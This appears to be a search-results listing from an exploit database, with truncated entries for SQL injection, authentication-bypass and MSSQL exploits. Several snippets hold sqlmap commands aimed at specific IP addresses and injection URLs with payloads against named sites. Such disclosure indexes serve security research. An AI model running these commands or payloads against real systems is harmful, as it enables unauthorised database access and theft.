432 matches found
Crescendo - Sales CRM Authentication Bypass Vulnerability
Exploit for asp platform in category web applications Crescendo - Sales CRM Authentication Bypass Vulnerability Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability Sql Injection Google Dork: N/A Date: July 15 , 2014 Exploit Author: Monendra Sahu email protected Vendor Homepag...
Crescendo - Sales CRM SQL Injection
Crescendo - Sales CRM Authentication Bypass Vulnerability Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability Sql Injection Google Dork: N/A Date: July 15 , 2014 Exploit Author: Monendra Sahu [email protected] Vendor Homepage: http://dejavuprotech.com/crecendo.php Test...
Medium: php54
Issue Overview: acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file. A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain...
DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilities
No description provided by source. DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilities .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [email protected] , [email protected] .:. Home : http://www.iphobos.com/blog/ .:. Script...
Chipmunk Board 1.3 (index.php?forumID) SQL Injection
No description provided by source. Exploit Title: Chipmunk Board index.php?forumID Remote SQL Injection Vulnerability Date: October, 01 st 2010 Author: Shamus Software Link: http://www.chipmunk-scripts.com/board/board.zip Version: Chipmunk Forums Version 1.3 Tested on: windows CVE : -...
Ferdows CMS Pro <= 1.1.0 - Multiple Vulnerabilities
No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: Ferdows CMS Pro =1.1.0 Multiple Vulnerabilities Vendor: www.fcms.ir Exploit: Available Vulnerable Version: 1.1.0 Pro Impact: Medium Original Advisory: http://www.bugreport.ir/index77.htm Fix: N/A 1...
Microsoft SQL Server Payload Execution via SQL injection
No description provided by source. $Id: mssqlpayloadsqli.rb 11730 2011-02-08 23:31:44Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms o...
saspcms 0.9 - Multiple Vulnerabilities
No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: SASPCMS Multiple Vulnerabilities Vendor: http://www.lgasoft.com Vulnerable Version: 0.9 prior versions also may be affected Exploitation: Remote with browser Fix: N/A - Description: SASPCMS is an ASP Conte...
LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities
No description provided by source. LimeSurvey v2.00+ build 131107 Script Insertion And SQL Injection Vulnerability Vendor: LimeSurvey Project Team Product web page: http://www.limesurvey.org Affected version: 2.00+ build 131009 2.00+ build 131022 2.00+ build 131031 2.00+ build 131107 Summary:...
MSSQL 7.0 - Remote Denial of Service Exploit
No description provided by source...
411cc Multiple SQL Injection Vulnerabilities
No description provided by source. =================================================================== 411CC e-Commerce = String' SQL Injection Vulnerabilities =================================================================== My + Author : KnocKout Contact : [email protected] Software info Web...
BPHolidayLettings 1.0 - Blind SQL Injection
No description provided by source. | AntiSecuritydotorg |...
Microsoft SQL Server Resolution Overflow
No description provided by source. $Id: ms02039slammer.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
ColdUserGroup 1.06 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/python ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit Vendor: http://www.coldgen.com/ Found by: mrme ----------------------------------------------- Script provided 'as is', without any warranty. Use for educational purposes only...
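SQL injection in a Yonyou general-purpose system
Brief description: Injection in a Yonyou general-purpose system Detailed description: Yonyou TurboCRM has a generic SQL injection. http://220.178.27.116:8001/background/recievesms.php?ID=1 The ID parameter is not filtered and is vulnerable to MSSQL time-based blind injection. sqlmap.py -u "http://220.178.27.116:8001//background/recievesms.php?ID=1" --dbs --current-user --current-db --is-dba master model msdb tempdb turbocrm70 UFDATA0012011...
An SQL injection in Kingdee
Brief description: I, Hu Hansan, am back again. So many databases, such high privileges; I'm not going to take this any further. I'll stop here:...
Zoomla CMS SQL injection and filter bypass
Brief description: Demonstrated on the official site and the demo site, bypassing the injection filter. Detailed description: This point: http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 Like this:...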
Hostscan - PHP tool for scanning a specific range of hosts
Hostscan is a PHP tool which allows you to scan a specific range of hosts, mostly for information gathering and testing for weak passwords. I guess it's a pentest tool; I created it to automate some tests that I often do. Since it's PHP, it works quite slowly compared to client-side software. How it...
SQL Servers MSSQL Vendor-specific SQL Injection
SQL injection techniques can allow remote attackers to execute SQL commands on SQL servers. Successful exploitation could allow an attacker to disclose confidential information, modify or shut down the database, or execute arbitrary code on affected servers...
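SQL injection in the Boyun non-book materials management system
Brief description: JSP+MSSQL. Few sites using this system can be found by searching, but most of them are universities and colleges. Detailed description: Injection point: http://211.68.196.67:808/poweb/asearch.do?LanguageType=0&status=showpage Parameter: LanguageType C:\Python27\sqlmapsqlmap.py -u "http://211.68.196.67:808/poweb/asearch.do?Langu ageType=0&status=showpage" --dbms=mssql sqlmap/1.0-dev - automatic SQL...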